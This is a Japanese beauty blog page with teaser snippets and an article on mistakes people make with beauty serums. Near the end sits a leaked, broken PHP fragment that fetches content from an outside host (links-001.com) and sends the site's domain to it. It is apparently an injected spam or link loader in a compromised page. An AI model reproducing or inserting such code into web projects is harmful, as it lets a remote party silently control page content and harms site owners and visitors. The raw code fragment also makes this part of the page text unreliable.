前へ
次へ

自分に合った方法で肌の維持に努める

美容に対する考え方については個人差がありますし年代や性別によっても違いがあるので一概に言うことは出来

more

美容整形と女性の合理的な心理に関する話

今の時代、女性を中心に美容整形に興味を持つ方が増えてきています。
美容整形は顔の造形を変えるこ

more

しっくりくるファンデーションのカラーとは

ファンデーションを使ってみたいけど、色が合うか不安、そんな初めてのメイク事情には、色見本から選んで欲

more

間違った美容液の使い方を正しく直そう

美容液を使っているのに効果が得られない人は使い方を間違えているかもしれません。
美容液は効果の出やすいスキンケアアイテムなので気になる製品も多くなるかもしれません。
しかし、美容液の重ねづけは肌によくありません。
重ねたからといって相乗効果は起こりません。
組み合わせによってはトラブルを起こす可能性もあります。
肌に吸収される量は限りがあるので、重ねつけはなるべくやめましょう。
複数の美容液を使いたいなら朝と夜や部分的に使い分けてください。
また、早く効果を実感したいからと言って多めにつけるのもいけません。
肌に吸収されずに無駄になってしまいます。
美容液は油分が多く含まれているので、紫外線に当たると酸化を引き起こしてしまいます。
これは他の製品でも同様ですが、つけるときに強くパッティングするとお肌を傷めます。
適度なパッティングは肌の血行を良く浸透されます。
しかし、強すぎると肌の毛細血管に刺激となるので注意しましょう。
そして、美容液を使う際は必ず指示に従って適量を使います。
高価な美容液がもったいなくて少量しか使わないことがあるかもしれません。
減りが遅くて時間が大分経過した美容液は品質が劣化しやすいです。
特に有効成分を使用している製品は注意しましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top